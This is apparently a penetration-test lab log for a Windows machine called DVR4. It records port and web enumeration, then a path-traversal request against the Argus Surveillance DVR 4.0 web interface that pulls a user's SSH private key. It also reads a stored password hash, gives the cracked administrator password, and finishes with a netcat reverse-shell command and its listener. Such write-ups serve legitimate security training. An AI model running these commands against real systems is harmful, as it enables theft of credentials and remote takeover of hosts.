DVR4

🧪 Pentest Log: {{date:2025-08-04}}

🔍 Target Information

Machine Name: DVR4
IP Address: 192.168.223.179
Operating System: Windows

ip=192.168.223.179

📡 Enumeration

🔌 Port Scanning

Command Used

ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) 

nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt

nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt

Port 22

Port 135

rpcclient -U '' -N $ip

Port 139/445

smbclient -L \\\\$ip\\

enum4linux -a $ip

Port 8080

Web Content Enumeration

gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt

dirsearch -u http://$ip -r -o dirsearch.txt

found

Argus Surveillance DVR

Google "Argus Surveillance DVR exploit", found

Argus Surveillance DVR 4.0.0.0 - Directory Traversal

💣 Exploitation / Foothold

📌 Vulnerability Summary

Service / Port: 8080
Vulnerability Type: LFI

🚀 Exploit Execution

🔧 Exploit Method

Manual
Public Exploit
Custom Script

Tool / Script Used:

curl "http://$ip:8080/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FUsers%2Fviewer%2F.ssh%2Fid_rsa&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD="

🧬 Privilege Escalation

👤 Current Access

User: viewer
Groups: N/A
Shell Type: ssh

🔍 Enumeration

Manual:

type "C:\ProgramData\PY_Software\Argus Surveillance DVR\DVRParams.ini"

found

Password0=ECB453D16069F641E03BD9BD956BFE36BD8F3CD9D9A8

🔓 Privilege Escalation Exploit

📌 Exploit Summary

Technique Used: Weak Password Encryption
Target Binary/Service: Argus Surveillance DVR 4.0
Reference / Source: exploitDB

🔧 Exploit Steps

Crack the password using the exploit

14WatchD0g$

Smash to root

runas /user:administrator "c:\users\viewer\nc.exe 192.168.45.163 8080 -e c:\windows\system32\cmd.exe"

nc -lvnp 8080